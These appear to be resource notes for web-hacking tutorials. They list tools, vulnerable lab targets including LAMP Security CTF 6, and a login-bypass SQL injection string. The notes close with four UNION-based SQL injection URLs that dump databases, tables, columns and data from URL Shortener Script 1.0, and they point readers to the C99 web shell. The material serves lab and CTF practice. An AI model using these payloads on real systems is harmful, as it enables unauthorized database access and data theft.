Who Wants to be a Millionaire




OWASP Mantra and Who Wants to be a Millionaire

OWASP Mantra - http://www.getmantra.com/
Who wants to be a Millionaire - http://sourceforge.net/projects/vulfa
7-Zip - http://www.7-zip.org/
HTTP File Server - http://www.rejetto.com/hfs/

LAMP Security CTF 6



OWASP Mantra and LAMP Security CTF 6

OWASP Mantra - http://www.getmantra.com/
LAMP Security CTF 6 Image - http://sourceforge.net/projects/lampsecurity/files/latest/download
VMWare Player - http://www.vmware.com/products/player/
7-Zip - http://www.7-zip.org/
SoftPerfect Network Scanner - http://www.softperfect.com/products/networkscanner/
C99 Shell - Google it. - http://lmgtfy.com/?q=c99+shell

Successful injection string - username=' OR 1=1 #&password=') OR 1=1 #

URL Shortener Script SQL Injection Vulnerability



OWASP Mantra - http://www.getmantra.com/

URL Shortener Script 1.0 SQL Injection Vulnerability - http://www.exploit-db.com/exploits/17937/


SQL Injection cheat sheets -

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

http://ha.ckers.org/sqlinjection/

How to : Create a simple url shortener script is a few minutes

http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a-few-minuts/

Exploit-DB URL: http://www.exploit-db.com/exploits/17937/

Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--

Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--

Getting columns: http://www.service.com/shortURL/show.php?id=1234.5union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--

Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --